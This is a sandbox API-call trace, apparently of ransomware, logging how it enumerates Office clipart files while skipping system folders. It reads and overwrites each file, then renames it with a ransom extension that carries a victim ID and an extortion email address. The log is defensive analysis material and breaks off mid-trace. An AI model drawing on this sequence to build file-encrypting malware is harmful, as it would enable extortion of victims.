RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0085.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0164153.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0164153.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0164153.JPG", lpUsedDefaultChar=0x0) returned 12 [0085.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0085.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0085.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0085.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0085.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0164153.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.894] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=46484) returned 1 [0085.894] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb590) returned 0x24d210 [0085.895] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xb590, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xb590, lpOverlapped=0x0) returned 1 [0085.918] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.918] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xb590, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xb590, lpOverlapped=0x0) returned 1 [0085.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.920] CloseHandle (hObject=0x314) returned 1 [0085.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0085.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0085.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0085.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0085.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0085.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0085.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0085.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0085.920] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0164153.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0164153.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0085.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0085.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0085.921] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaa396f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaa396f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeac9c22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x51aa, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0168644.WMF", cAlternateFileName="")) returned 1 [0085.921] lstrcmpiW (lpString1="J0168644.WMF", lpString2=".") returned 1 [0085.921] lstrcmpiW (lpString1="J0168644.WMF", lpString2="..") returned 1 [0085.921] lstrcmpiW (lpString1="J0168644.WMF", lpString2="...") returned 1 [0085.921] lstrcmpiW (lpString1="J0168644.WMF", lpString2="windows") returned -1 [0085.921] lstrcmpiW (lpString1="J0168644.WMF", lpString2="recovery") returned -1 [0085.921] lstrcmpiW (lpString1="J0168644.WMF", lpString2="perflogs") returned -1 [0085.921] lstrcmpiW (lpString1="J0168644.WMF", lpString2="documents and settings") returned 1 [0085.921] lstrcmpiW (lpString1="J0168644.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.921] lstrcmpiW (lpString1="J0168644.WMF", lpString2="system volume information") returned -1 [0085.921] lstrcmpiW (lpString1="J0168644.WMF", lpString2="msocache") returned -1 [0085.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0085.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0168644.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0168644.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0168644.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0085.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0085.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0168644.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0168644.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0168644.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0085.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0085.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0085.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0085.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0168644.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.923] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20906) returned 1 [0085.923] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51a0) returned 0x24d210 [0085.923] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x51a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x51a0, lpOverlapped=0x0) returned 1 [0085.937] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.937] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x51a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x51a0, lpOverlapped=0x0) returned 1 [0085.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.937] CloseHandle (hObject=0x314) returned 1 [0085.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0085.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0085.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0085.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0085.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0085.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0085.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0085.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0085.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0085.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0085.938] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0168644.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0168644.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0085.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0085.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0085.939] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7d707, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea7d707, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeac9c22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3888, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0171685.WMF", cAlternateFileName="")) returned 1 [0085.939] lstrcmpiW (lpString1="J0171685.WMF", lpString2=".") returned 1 [0085.939] lstrcmpiW (lpString1="J0171685.WMF", lpString2="..") returned 1 [0085.939] lstrcmpiW (lpString1="J0171685.WMF", lpString2="...") returned 1 [0085.939] lstrcmpiW (lpString1="J0171685.WMF", lpString2="windows") returned -1 [0085.939] lstrcmpiW (lpString1="J0171685.WMF", lpString2="recovery") returned -1 [0085.939] lstrcmpiW (lpString1="J0171685.WMF", lpString2="perflogs") returned -1 [0085.939] lstrcmpiW (lpString1="J0171685.WMF", lpString2="documents and settings") returned 1 [0085.939] lstrcmpiW (lpString1="J0171685.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.939] lstrcmpiW (lpString1="J0171685.WMF", lpString2="system volume information") returned -1 [0085.939] lstrcmpiW (lpString1="J0171685.WMF", lpString2="msocache") returned -1 [0085.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0085.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0171685.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0171685.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0171685.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0085.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0085.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0171685.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0171685.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0171685.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0085.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0085.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0085.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0085.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0171685.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.941] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14472) returned 1 [0085.941] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3880) returned 0x24d210 [0085.941] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3880, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3880, lpOverlapped=0x0) returned 1 [0085.943] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.943] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3880, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3880, lpOverlapped=0x0) returned 1 [0085.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.944] CloseHandle (hObject=0x314) returned 1 [0085.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0085.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0085.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0085.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0085.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0085.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0085.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0085.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0085.944] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0171685.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0171685.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0085.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0085.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0085.945] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7d707, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea7d707, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaa396f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ae8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0171847.WMF", cAlternateFileName="")) returned 1 [0085.945] lstrcmpiW (lpString1="J0171847.WMF", lpString2=".") returned 1 [0085.945] lstrcmpiW (lpString1="J0171847.WMF", lpString2="..") returned 1 [0085.945] lstrcmpiW (lpString1="J0171847.WMF", lpString2="...") returned 1 [0085.945] lstrcmpiW (lpString1="J0171847.WMF", lpString2="windows") returned -1 [0085.945] lstrcmpiW (lpString1="J0171847.WMF", lpString2="recovery") returned -1 [0085.945] lstrcmpiW (lpString1="J0171847.WMF", lpString2="perflogs") returned -1 [0085.945] lstrcmpiW (lpString1="J0171847.WMF", lpString2="documents and settings") returned 1 [0085.945] lstrcmpiW (lpString1="J0171847.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.945] lstrcmpiW (lpString1="J0171847.WMF", lpString2="system volume information") returned -1 [0085.945] lstrcmpiW (lpString1="J0171847.WMF", lpString2="msocache") returned -1 [0085.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0085.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0171847.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0171847.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0171847.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0085.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0085.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0171847.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0171847.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0171847.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0085.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0085.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0085.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0085.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0171847.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.947] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6888) returned 1 [0085.947] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.947] 